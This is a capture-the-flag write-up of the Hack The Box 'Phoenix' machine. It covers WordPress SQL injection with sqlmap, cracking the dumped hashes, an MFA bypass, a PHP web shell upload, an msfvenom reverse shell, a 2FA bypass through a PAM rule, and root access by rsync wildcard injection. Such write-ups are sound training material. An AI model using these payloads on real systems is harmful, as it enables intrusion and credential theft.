HTB Writeup: Phoenix

Rising from ashes and flying over the MFAs

Enumeration

nmap

[email protected] Phoenix please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
[sudo] password for mostwanted002:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 19:50 IST
Nmap scan report for 10.129.133.247 (10.129.133.247)
Host is up (0.075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 9d:f3:87💿34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
|   256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_  256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp  open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
443/tcp open  ssl/http Apache httpd
| tls-alpn:
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Not valid before: 2022-02-15T20:08:43
|_Not valid after:  2032-02-13T20:08:43
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.71 seconds
  1. A web server is listening on TPC/80 and TCP/443.

  2. The listener on TCP/80 is redirecting the requests to https://phoenix.htb

  3. The web application is also found to be a WordPress instance.

    Untitled

wpscan

[email protected] Phoenix wpscan --url https://phoenix.htb/ --api-token <wp_scan_api>  --disable-tls-checks
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: https://phoenix.htb/ [10.129.133.247]
[+] Started: Sun Jun 26 20:07:10 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: https://phoenix.htb/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
 | Found By: Rss Generator (Passive Detection)
 |  - https://phoenix.htb/feed/, <generator>https://wordpress.org/?v=5.9</generator>
 |  - https://phoenix.htb/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>
 |
 | [!] 3 vulnerabilities identified:
 |
 | [!] Title: WordPress (5.9-5.9.1) / Gutenberg (9.8.0-12.7.1) - Contributor+ Stored Cross-Site Scripting
 |     Fixed in: 5.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/1fd6742e-1a32-446d-be3d-7cce44f8f416
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WordPress < 5.9.2 - Prototype Pollution in jQuery
 |     Fixed in: 5.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/1ac912c1-5e29-41ac-8f76-a062de254c09
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |
 | [!] Title: WordPress < 5.9.2 / Gutenberg < 12.7.2 - Prototype Pollution via Gutenberg’s wordpress/url package
 |     Fixed in: 5.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/6e61b246-5af1-4a4f-9ca8-a8c87eb2e499
 |      - https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/
 |      - https://github.com/WordPress/gutenberg/pull/39365/files

[+] WordPress theme in use: coming-soon-event
 | Location: https://phoenix.htb/wp-content/themes/coming-soon-event/
 | Latest Version: 1.0.8 (up to date)
 | Last Updated: 2021-08-24T00:00:00.000Z
 | Readme: https://phoenix.htb/wp-content/themes/coming-soon-event/readme.txt
 | Style URL: https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0
 | Style Name: Coming Soon Event
 | Description: The Coming Soon Event under construction theme will play a big role in boosting up the business and ...
 | Author: blogwp
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.0.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://phoenix.htb/wp-content/themes/coming-soon-event/style.css?ver=1.0.0, Match: 'Version: 1.0.8'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] accordion-slider-gallery
 | Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:22:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] asgaros-forum
 | Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
 | Last Updated: 2022-01-30T12:54:00.000Z
 | [!] The version is out of date, the latest version is 2.0.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
 |     Fixed in: 1.15.13
 |     References:
 |      - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24827
 |      - https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
 |
 | [!] Title: Asgaros Forums < 1.15.14 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 1.15.14
 |     References:
 |      - https://wpscan.com/vulnerability/70b5fd89-4b59-4cbb-b60f-ac54fbb5a3e3
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42365
 |      - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-42365
 |
 | [!] Title: Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id
 |     Fixed in: 1.15.15
 |     References:
 |      - https://wpscan.com/vulnerability/c60a3d40-449c-4c84-8d13-68c04267c1d7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25045
 |      - https://plugins.trac.wordpress.org/changeset/2642215
 |
 | [!] Title: Asgaros Forum < 2.0.0 - Subscriber+ Blind SQL Injection
 |     Fixed in: 2.0.0
 |     References:
 |      - https://wpscan.com/vulnerability/35272197-c973-48ad-8405-538bfbafa172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0411
 |      - https://plugins.trac.wordpress.org/changeset/2669226/asgaros-forum
 |
 | Version: 1.15.12 (10% confidence)
 | Found By: Query Parameter (Passive Detection)
 |  - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12

[+] photo-gallery-builder
 | Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
 | Latest Version: 2.3
 | Last Updated: 2022-05-07T11:20:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] pie-register
 | Location: https://phoenix.htb/wp-content/plugins/pie-register/
 | Latest Version: 3.7.5.1
 | Last Updated: 2022-06-13T07:37:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | [!] 14 vulnerabilities identified:
 |
 | [!] Title: Pie Register - wp-login.php Multiple Parameter XSS
 |     Fixed in: 1.31
 |     References:
 |      - https://wpscan.com/vulnerability/22a823d1-848d-411c-a7bd-708a503ec193
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4954
 |      - https://www.securityfocus.com/bid/61140/
 |      - https://exchange.xforce.ibmcloud.com/vulnerabilities/85604
 |
 | [!] Title: Pie Register <= 2.0.13 - Privilege escalation
 |     Fixed in: 2.0.14
 |     References:
 |      - https://wpscan.com/vulnerability/9c9f66f2-ef80-4673-83a5-6e5a8e19012a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8802
 |      - https://security.szurek.pl/pie-register-2013-privilege-escalation.html
 |
 | [!] Title: Pie Register <= 2.0.14 - Cross-Site Scripting (XSS)
 |     Fixed in: 2.0.15
 |     References:
 |      - https://wpscan.com/vulnerability/44b6576c-2989-4b8e-8662-07c85c0028c2
 |      - https://packetstormsecurity.com/files/130774/
 |
 | [!] Title: Pie Register 2.0.14-2.0.15 - SQL Injection
 |     Fixed in: 2.0.16
 |     References:
 |      - https://wpscan.com/vulnerability/f0b9e57d-e319-415d-8333-48586c111108
 |      - https://g0blin.co.uk/g0blin-00040/
 |
 | [!] Title: Pie Register 2.0.14-2.0.15 - Privilege Escalation
 |     Fixed in: 2.0.16
 |     References:
 |      - https://wpscan.com/vulnerability/f30f77bd-2e6e-45cd-ac02-c9d3985844da
 |      - https://g0blin.co.uk/g0blin-00041/
 |
 | [!] Title: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS)
 |     Fixed in: 2.0.19
 |     References:
 |      - https://wpscan.com/vulnerability/6588a392-1bfa-4699-ae82-ffd22a0eac61
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7377
 |      - https://www.securityfocus.com/archive/1/536668
 |      - https://github.com/GTSolutions/Pie-Register
 |
 | [!] Title: Pie-Register <= 2.0.18 - Authenticated Blind SQL Injection
 |     Fixed in: 2.0.19
 |     References:
 |      - https://wpscan.com/vulnerability/d38db297-0e1f-44a8-86f0-2349a2017342
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7682
 |      - https://www.securityfocus.com/archive/1/536669
 |      - https://github.com/GTSolutions/Pie-Register
 |      - https://packetstormsecurity.com/files/133929/
 |
 | [!] Title: Pie Register <= 3.0.9 - Authenticated Blind SQL Injection
 |     Fixed in: 3.0.10
 |     References:
 |      - https://wpscan.com/vulnerability/eff197b9-254e-4452-a63d-25c64d0c4a2c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10969
 |      - https://www.exploit-db.com/exploits/44867/
 |      - https://seclists.org/fulldisclosure/2018/Jun/32
 |      - https://plugins.trac.wordpress.org/changeset/1892614/pie-register
 |
 | [!] Title: Pie Register <= 3.0.17 - Unauthenticated Cross-Site Scripting (XSS)
 |     Fixed in: 3.0.18
 |     References:
 |      - https://wpscan.com/vulnerability/2a05ebe6-ad16-4070-90ae-be600cfe2b08
 |      - https://plugins.trac.wordpress.org/changeset/1962835/pie-register
 |      - https://packetstormsecurity.com/files/149924/
 |
 | [!] Title: Pie Register < 3.1.2 - SQL Injection
 |     Fixed in: 3.1.2
 |     References:
 |      - https://wpscan.com/vulnerability/44262b4f-d6fa-4333-ac95-d970d93e0802
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15659
 |
 | [!] Title: Pie Register < 3.7.0.1 - Reflected Cross-Site Scripting (XSS)
 |     Fixed in: 3.7.0.1
 |     References:
 |      - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24239
 |      - https://plugins.trac.wordpress.org/changeset/2507536/
 |
 | [!] Title: Pie Register < 3.7.1.6 - Unauthenticated SQL Injection
 |     Fixed in: 3.7.1.6
 |     References:
 |      - https://wpscan.com/vulnerability/6bed00e4-b363-43b8-a392-d068d342151a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24731
 |
 | [!] Title: Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
 |     Fixed in: 3.1.7.6
 |     References:
 |      - https://wpscan.com/vulnerability/40d347b1-b86e-477d-b4c6-da105935ce37
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24647
 |
 | [!] Title: Pie Register < 3.7.2.4 - Open Redirect
 |     Fixed in: 3.7.2.4
 |     Reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4
 |
 | The version could not be determined.

[+] timeline-event-history
 | Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
 | Latest Version: 2.2
 | Last Updated: 2022-05-07T11:26:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <==============================================================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 7
 | Requests Remaining: 68

[+] Finished: Sun Jun 26 20:07:23 2022
[+] Requests Done: 202
[+] Cached Requests: 7
[+] Data Sent: 41.031 KB
[+] Data Received: 18.628 MB
[+] Memory used: 217.18 MB
[+] Elapsed time: 00:00:12
  1. The wordpress installation is found to be vulnerable to [CVE-2021-24827](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24827), an Unauthenticated SQL Injection in Asgaros Forum versions < 1.15.13. The version reported by wpscan is 1.15.12

  2. The forum is found at https://phoenix.htb/forum/

    Untitled

Initial Foothold

sqlmap

  1. A sqlmap scan is initiated to find the attack vector in the vulnerable plugin.

  2. According the PoC present at [WPScan Database Website](https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1), the vulnerable URL is https://example.com/forum/?subscribe_topic=<INJECTION>

    ---
    Parameter: subscribe_topic (GET)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: subscribe_topic=0 AND (SELECT 1495 FROM (SELECT(SLEEP(5)))KCSU)
    ---
    [20:24:13] [INFO] the back-end DBMS is MySQL
    web application technology: Apache
    back-end DBMS: MySQL >= 5.0.12
    
  3. The parameter is time-based injection. This can be really slow in case of exfiltrating everything. To keep the attack precise and quick, only specific tables from specific databases can be extracted.

  4. To extract list of databases available on remote host, --dbs flag in sqlmap

    [20:29:37] [INFO] the back-end DBMS is MySQL
    web application technology: Apache
    back-end DBMS: MySQL >= 5.0.12
    [20:29:37] [INFO] fetching database names
    [20:29:37] [INFO] fetching number of databases
    [20:29:37] [INFO] resumed: 2
    [20:29:37] [INFO] resumed: information_schema
    [20:29:37] [INFO] resumed: wordpress
    available databases [2]:
    [*] information_schema
    [*] wordpress
       
    [20:29:37] [INFO] fetched data logged to text files under '/home/mostwanted002/.local/share/sqlmap/output/phoenix.htb'
       
    [*] ending @ 20:29:37 /2022-06-26/
    
  5. The wordpress user information is stored in the database wordpress within the table wp_users.

    user_pass                          user_login
    $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. Phoenix
    $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. john
    $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. Jsmith
    $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 Jane
    $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. Jack
    
  6. The hashes then can be cracked using hashcat. The hashmode is identified as phppass

    Untitled

    .\hashcat.exe -m 400 -a 0 Y:\Documents\HTB\Phoenix\wp_users.hash -O G:\Wordlists\rockyou.txt
       
    # -m 400 -> hash mode 400 (phppass)
    # -a 0 -> Attack Mode 0 (Dictionary based attack)
    # -O -> Optimized Kernel (for faster attack speeds)
    
  7. 3 hashes are recovered out of 5

    $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc.:phoenixthefirebird14:Phoenix
    $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz.:[email protected]:john
    $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G.:superphoenix:Jsmith
    

Wordpress Login and MFA bypass

  1. From Forums, it is found the user Phoenix is the wordpress/website admin.

  2. On logging in with the credentials Phoenix:phoenixthefirebird14, the website redirects to a 2 Factor Authentication page.

    Untitled

  3. A hidden form is found in the source code of this MFA web page.

    <form name="f" id="mo2f_backto_inline_registration" method="post" action="https://phoenix.htb/login/"
              class="mo2f_display_none_forms">
            <input type="hidden" name="miniorange_back_inline_reg_nonce"
                   value="0df0747734"/>
            <input type="hidden" name="session_id" value="NMHrRoahet3PrAiT9ELW+r+3mrF/pzu2K68zA4d+8i/mAHPQX+8aWxSbWK+jdtWh2CfGmlF6YVw9DRVSQWremNA+YhjzBpMABcDy8Zb2jlo="/>
            <input type="hidden" name="option" value="miniorange2f_back_to_inline_registration"> 
            <input type="hidden" name="redirect_to" value="https://phoenix.htb/wp-admin/"/>
                 
        </form>
    

    According to the documentation of Miniorange plugin, users can register their own MFA on first login. To exploit this functionality, the hidden for is to be submitted.

    This form is On inspecting the source code further, an interesting piece of code is found in the <script> section at the end of the web page.

    <scrip>jQuery('#miniorange_otp_token_back').click(function(){
                jQuery('#mo2f_backto_inline_registration').submit();
            });
            jQuery('a[href="#mo2f_backup_option"]').click(function() {
                jQuery('#mo2f_backup').submit();
              });
            jQuery('a[href="#mo2f_backup_generate"]').click(function() {
                jQuery('#mo2f_create_backup_codes').submit();
            });
       
            function mologinback() {
                jQuery('#mo2f_backto_mo_loginform').submit();
            }
       
            function mologinforgotphone() {
                jQuery('#mo2f_show_forgotphone_loginform').submit();
            }
            var is_ajax = '';
            if(is_ajax){
                jQuery('#mo2fa_softtoken').keypress(function (e) {
                    if (e.which == 13) {//Enter key pressed
                        e.preventDefault();
                        mo2f_otp_ajax(); 
                    }
                });
                jQuery("#miniorange_otp_token_submit").click(function(e){
                        e.preventDefault();
                        mo2f_otp_ajax();
                });
       
                function mo2f_otp_ajax(){
                    jQuery('#mo2fa_softtoken').prop('disabled','true');
                    jQuery('#miniorange_otp_token_submit').prop('disabled','true');
                    var data = {
                        "action"            : "mo2f_ajax",
                        "mo2f_ajax_option"  : "mo2f_ajax_otp",
                        "mo2fa_softtoken"   : jQuery( "input[name=\'mo2fa_softtoken\']" ).val(),
                        "miniorange_soft_token_nonce" : jQuery( "input[name=\'miniorange_soft_token_nonce\']" ).val(),
                        "session_id"        : jQuery( "input[name=\'session_id\']" ).val(),
                        "redirect_to"       : jQuery( "input[name=\'redirect_to\']" ).val(),
                        "request_origin_method" :  jQuery( "input[name=\'request_origin_method\']" ).val(),
                    };
                    jQuery.post(my_ajax_object.ajax_url, data, function(response) {
                        if(typeof response.data === "undefined")
                            jQuery("html").html(response);
                        else if(response.data.reload)
                            location.reload( true );
                        else
                            location.href = response.data.redirect;
                    });
                }
            }
    </script>
    

    The first function is submitting the required form via jQuery. To trigger this action, the same jQuery request can be issued in the developer console of the web browser.

    Untitled

  4. Now the 2FA can be skipped using Skip Two Factor option at the end of this form.

Webshell

  1. The further browsing of wordpress configuration and plugins, an interesting plugin is found. Download from files.

    Untitled

  2. By default, it doesn’t allow to upload .PHP, .PHP3 and similar files.

    Untitled

  3. To bypass this, .phtml can be added to the Accept types setting under Plugin Settings tab.

    Untitled

  4. After the settings are saved, a PHP web shell with extension .phtmlcan be uploaded.

    <?php 
    //payload.phtml
    passthru($_GET['cmd']);
    ?>
    

    Untitled

  5. The successful execution of command then can be checked by visiting https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=cat%20/etc/passwd

    Untitled

Reverse Shell

  1. A simple bash reverse shell can be achieved by using a generic TCP reverse shell payload from msfvenom.

    [email protected] Phoenix msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Listener IP> LPORT=<Listener Port> PrependFork=true -f elf | base64 -w0
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 106 bytes
    Final size of elf file: 226 bytes
       
    <Base64 Payload>
    
  2. The URLs can be then visited in the given order to obtain a reverse shell on the listener:

    1. https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=echo <base64_payload> | base64 -d > exploit
    2. https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=chmod 0755 ./exploit
    3. https://phoenix.htb/wp-content/uploads/payload.phtml?cmd=./exploit

    Untitled

User Access

  1. On looking at the contents of /etc/passwd , another user with username editor and full name John Smith is found.

  2. When the Jsmith’s password from wordpress db are used as SSH credentials for editor, a prompt for 2FA appears. This 2FA is found to be different from the one installed on the website.

    Untitled

  3. A way to bypass this MFA is required. For further enumeration, [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) is used.

  4. Reading the output of linPEAS, the configuration for login 2FA module is found in /etc/pam.d/sshd

    auth [success=1 default=ignore] pam_access.so accessfile=/etc/security/access-local.conf
    auth required pam_google_authenticator.so nullok user=root secret=/var/lib/twofactor/${USER}
    
  5. The default mode is set to ignore which will force the authentication on next method, that is Google 2FA PAM module.

  6. The man pages of pam_access.so, describes the parameter acessfile= as

    accessfile=/path/to/access.conf

    Indicate an alternative access.conf style configuration file to override the default. This can be useful when different services need different access lists.

  7. The contents of /etc/security/access-local.conf are found to be:

    (remote) [email protected]:/tmp$ cat /etc/security/access-local.conf
    + : ALL : 10.11.12.13/24
    - : ALL : ALL
    
    1. This indicates that clients from the network 10.11.12.13/24 can authenticate using standard pam_access.so instead of Google’s 2FA authentication, hence no 2FA required.
  8. The remote host has a network interface eth0, with the IP 10.11.12.13. This implies accessing SSH on 10.11.12.13 from the reverse shell won’t require 2FA. Testing it out turns out to be successful.

    Untitled

Privilege Escalation

Enumeration

  1. For enumerating with newer privileges, the linPEAS is run again. A /backup directory is found owned by the user editor, in which zip files are periodically saved and written by root.

  2. No obvious cron jobs and services were found in the linPEAS enumeration that were related to this activity. To monitor the activities on the remote host, pspy64 can be used. It can monitor commands being executed and file system activities all together.

    ./pspy64 -i 1000 -f
    
  3. A custom binary execution is found in the output of pspy64

    Untitled

    The binary is located at /usr/local/bin/cron.sh.x

  4. On executing the binary as user editor the complete execution can be traced by pspy64, since it is running with same privileges.

    Untitled

    #!/bin/bash
    NOW=$(date +"%Y-%m-%d-%H-%M")
    FILE="phoenix.htb.$NOW.tar"
       
    cd /backups
    mysqldump -u root wordpress > dbbackup.sql
    tar -cf $FILE dbbackup.sql && rm dbbackup.sql
    gzip -9 $FILE
    find . -type f -mmin +30 -delete
    rsync --ignore-existing -t *.* [email protected]:/backups/
     /usr/local/bin/cron.sh.x
    
  5. The rsync command has a wildcard in the command being executed.

Exploitation

  1. The -e flag in rsync is used to execute a custom script for the command issued. The wildcard can be exploited by creating a file with the name -e sh exploit.sh and placing a file exploit.sh in the /backups directory. [ Source]

    #!/bin/sh
    # Contents of exploit.sh
    id > pwned.txt # For proof of execution
    /tmp/exploit   # the generic reverse shell payload created using msfvenom.
    
  2. To create the blank file, following command can be issued as editor since the user has ownership and write access to the /backups directory.

    touch -- "-e sh exploit.sh"
    

    Untitled

    Untitled

The remote host is now completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related